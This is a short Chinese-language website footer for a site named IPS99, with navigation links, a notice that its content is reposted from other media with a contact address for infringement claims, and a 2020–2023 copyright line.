网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99